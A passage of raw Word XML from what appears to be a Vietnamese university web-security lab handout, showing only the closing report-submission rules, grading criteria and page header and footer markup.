          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>trong</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> đó X là Thứ tự buổi Thực hành, Y là số thứ tự Nhóm Thực hành/Tên Cá nhân đã đăng ký với GV). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106BF006" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t>Ví dụ: [</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>NT101.K</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>11.ANTT</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t>]-Session1_Group3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E3E0BC" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Nếu báo cáo có nhiều file, nén tất cả file vào file .ZIP với cùng tên file báo cáo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C315BE0" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:eastAsia="UVN Viet Sach" w:hAnsi="UTM Sach Viet" w:cs="UVN Viet Sach"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Không đặt tên đúng định dạng – yêu cầu, sẽ </w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>KHÔNG</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> chấm điểm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9E501B" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Nộp file báo cáo trên theo thời gian đã thống nhất tại courses.uit.edu.vn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5073EA55" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Đánh giá</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>: Sinh viên hiểu và tự thực hiện. Khuyến khích:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F1A682" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Chuẩn bị tốt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168D84B9" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Có nội dung mở rộng, ứng dụng trong kịch bản/câu hỏi phức tạp hơn, có đóng góp </w:t>
      </w:r>
      <w:bookmarkStart w:id="48" w:name="bookmark=id.3dy6vkm" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="49" w:name="bookmark=id.tyjcwt" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="48"/>
      <w:bookmarkEnd w:id="49"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">xây dựng. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E296939" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Bài sao chép, trễ, … sẽ được xử lý tùy mức độ vi phạm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B69C81" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="699ED0CF" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="center" w:pos="4815"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>HẾT</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00CD6539" w:rsidRPr="007913DC">
      <w:headerReference w:type="default" r:id="rId141"/>
      <w:footerReference w:type="default" r:id="rId142"/>
      <w:headerReference w:type="first" r:id="rId143"/>
      <w:pgSz w:w="11907" w:h="16839"/>
      <w:pgMar w:top="1440" w:right="837" w:bottom="1620" w:left="1440" w:header="540" w:footer="13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5D429" w14:textId="77777777" w:rsidR="005402EA" w:rsidRDefault="005402EA">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="069FD5FA" w14:textId="77777777" w:rsidR="005402EA" w:rsidRDefault="005402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UTM Neo Sans Intel">
    <w:altName w:val="Calibri"/>
    <w:panose1 w:val="02040603050506020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="UTM Swiss 721 Black Condensed">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UVN Viet Sach">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UTM Sach Vi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8C15F" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRDefault="00000000">
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="4185"/>
      </w:tabs>
      <w:rPr>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251661312" behindDoc="1" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="34446502" wp14:editId="3EE3D5C5">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>-520699</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>9893300</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="0"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a:off x="1917318" y="3780000"/>
                        <a:ext cx="6857365" cy="0"/>
                      </a:xfrm>
                      <a:prstGeom prst="straightConnector1">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln w="9525" cap="flat" cmpd="sng">
                        <a:solidFill>
                          <a:srgbClr val="21212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-520699</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>9893300</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="0" cy="12700"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="109" name="image119.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image11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Pr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wpg">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251662336" behindDoc="1" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="458CAA74" wp14:editId="4073ED59">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>1447800</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>9867900</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="371475" cy="556260"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="110" name="Straight Arrow Connector 110"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvCnPr/>
                    <wps:spPr>
                      <a:xfrm flipH="1">
                        <a:off x="5174550" y="3516158"/>
                        <a:ext cx="342900" cy="527685"/>
                      </a:xfrm>
                      <a:prstGeom prst="straightConnector1">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln w="9525" cap="flat" cmpd="sng">
                        <a:solidFill>
                          <a:srgbClr val="21212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1447800</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>9867900</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="371475" cy="556260"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="110" name="image120.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image120.png"/>
                      <pic:cNvPicPr preferRelativeResize="0"/>
                    </pic:nvPicPr>
                    <pic:blipFill>
                      <a:blip r:embed="rId2"/>
                      <a:srcRect/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </pic:blipFill>
                    <pic:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="371475" cy="556260"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect"/>
                      <a:ln/>
                    </pic:spPr>
                  </pic:pic>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wpg">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251663360" behindDoc="1" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="3A653491" wp14:editId="579E7238">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>-419099</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>9931400</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="1819275" cy="514350"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="105" name="Rectangle 105"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvSpPr/>
                    <wps:spPr>
                      <a:xfrm>
                        <a:off x="4450650" y="3537113"/>
                        <a:ext cx="1790700" cy="485775"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </wps:spPr>
                    <wps:txbx>
                      <w:txbxContent>
                        <w:p w14:paraId="1CB45232" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRDefault="00000000">
                          <w:pPr>
                            <w:jc w:val="right"/>
                            <w:textDirection w:val="btLr"/>
                          </w:pPr>
                          <w:r>
                            <w:rPr>
                              <w:rFonts w:eastAsia="UTM Neo Sans Intel"/>
                              <w:b/>
                              <w:i/>
                              <w:sz w:val="20"/>
                            </w:rPr>
                            <w:t xml:space="preserve">   PHÒNG THÍ NGHIỆM</w:t>
                          </w:r>
                        </w:p>
                        <w:p w14:paraId="4CC20C46" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRDefault="00000000">
                          <w:pPr>
                            <w:jc w:val="right"/>
                            <w:textDirection w:val="btLr"/>
                          </w:pPr>
                          <w:r>
                            <w:rPr>
                              <w:rFonts w:eastAsia="UTM Neo Sans Intel"/>
                              <w:b/>
                              <w:i/>
                              <w:sz w:val="20"/>
                            </w:rPr>
                            <w:t>AN TOÀN THÔNG TIN</w:t>
                          </w:r>
                        </w:p>
                      </w:txbxContent>
                    </wps:txbx>
                    <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="36575" tIns="36575" rIns="36575" bIns="36575"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-419099</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>9931400</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="1819275" cy="514350"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="105" name="image115.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image115.png"/>
                      <pic:cNvPicPr preferRelativeResize="0"/>
                    </pic:nvPicPr>
                    <pic:blipFill>
                      <a:blip r:embed="rId3"/>
                      <a:srcRect/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </pic:blipFill>
                    <pic:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="1819275" cy="514350"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect"/>
                      <a:ln/>
                    </pic:spPr>
                  </pic:pic>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wpg">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251664384" behindDoc="1" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="7490BC7C" wp14:editId="6F9BE1B2">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>1739900</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>9931400</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="4600575" cy="575775"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="106" name="Rectangle 106"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvSpPr/>
                    <wps:spPr>
                      <a:xfrm>
                        <a:off x="3060000" y="3506400"/>
                        <a:ext cx="4572000" cy="547200"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </wps:spPr>
                    <wps:txbx>
                      <w:txbxContent>
                        <w:p w14:paraId="6557085D" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRDefault="00000000">
                          <w:pPr>
                            <w:jc w:val="right"/>
                            <w:textDirection w:val="btLr"/>
                          </w:pPr>
                          <w:r>
                            <w:rPr>
                              <w:rFonts w:eastAsia="UTM Neo Sans Intel"/>
                              <w:color w:val="808080"/>
                              <w:sz w:val="20"/>
                            </w:rPr>
                            <w:t xml:space="preserve">Báo </w:t>
                          </w:r>
                          <w:proofErr w:type="gramStart"/>
                          <w:r>
                            <w:rPr>
                              <w:rFonts w:eastAsia="UTM Neo Sans Intel"/>
                              <w:color w:val="808080"/>
                              <w:sz w:val="20"/>
                            </w:rPr>
                            <w:t>cáo  Bảo</w:t>
                          </w:r>
                          <w:proofErr w:type="gramEnd"/>
                          <w:r>
                            <w:rPr>
                              <w:rFonts w:eastAsia="UTM Neo Sans Intel"/>
                              <w:color w:val="808080"/>
                              <w:sz w:val="20"/>
                            </w:rPr>
                            <w:t xml:space="preserve"> mật Web  và  Ứng dụng</w:t>
                          </w:r>
                        </w:p>
                        <w:p w14:paraId="56E8D2D1" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRDefault="00000000">
                          <w:pPr>
                            <w:jc w:val="right"/>
                            <w:textDirection w:val="btLr"/>
                          </w:pPr>
                          <w:r>
                            <w:rPr>
                              <w:rFonts w:eastAsia="UTM Neo Sans Intel"/>
                              <w:color w:val="808080"/>
                              <w:sz w:val="11"/>
                            </w:rPr>
                            <w:tab/>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:rFonts w:eastAsia="UTM Neo Sans Intel"/>
                              <w:color w:val="808080"/>
                              <w:sz w:val="20"/>
                            </w:rPr>
                            <w:t xml:space="preserve">HỌC KỲ II </w:t>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                              <w:color w:val="808080"/>
                              <w:sz w:val="20"/>
                            </w:rPr>
                            <w:t>–</w:t>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:rFonts w:eastAsia="UTM Neo Sans Intel"/>
                              <w:color w:val="808080"/>
                              <w:sz w:val="20"/>
                            </w:rPr>
                            <w:t xml:space="preserve"> NĂM HỌC 2022-2023</w:t>
                          </w:r>
                        </w:p>
                      </w:txbxContent>
                    </wps:txbx>
                    <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="36575" tIns="36575" rIns="36575" bIns="36575"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1739900</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>9931400</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="4600575" cy="575775"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="106" name="image116.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image116.png"/>
                      <pic:cNvPicPr preferRelativeResize="0"/>
                    </pic:nvPicPr>
                    <pic:blipFill>
                      <a:blip r:embed="rId4"/>
                      <a:srcRect/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </pic:blipFill>
                    <pic:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="4600575" cy="575775"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect"/>
                      <a:ln/>
                    </pic:spPr>
                  </pic:pic>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
  </w:p>
  <w:p w14:paraId="672F2556" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRDefault="00CD6539">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="nil"/>
        <w:left w:val="nil"/>
        <w:bottom w:val="nil"/>
        <w:right w:val="nil"/>
        <w:between w:val="nil"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:rPr>
        <w:rFonts w:eastAsia="UTM Neo Sans Inte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86EA2" w14:textId="77777777" w:rsidR="005402EA" w:rsidRDefault="005402EA">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3FDA70F1" w14:textId="77777777" w:rsidR="005402EA" w:rsidRDefault="005402EA">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="1">
    <w:p w14:paraId="7605CCD3" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FootnoteReference"/>
        </w:rPr>
        <w:footnoteRef/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>Ghi nội dung công việc, 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63540" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="nil"/>
        <w:left w:val="nil"/>
        <w:bottom w:val="nil"/>
        <w:right w:val="nil"/>
        <w:between w:val="nil"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
        <w:tab w:val="left" w:pos="8424"/>
      </w:tabs>
      <w:ind w:left="900"/>
      <w:rPr>
        <w:rFonts w:eastAsia="UTM Neo Sans Intel"/>
        <w:b/>
        <w:color w:val="2E75B5"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:eastAsia="UTM Neo Sans Intel"/>
        <w:b/>
        <w:noProof/>
        <w:color w:val="2E75B5"/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wpg">
          <w:drawing>
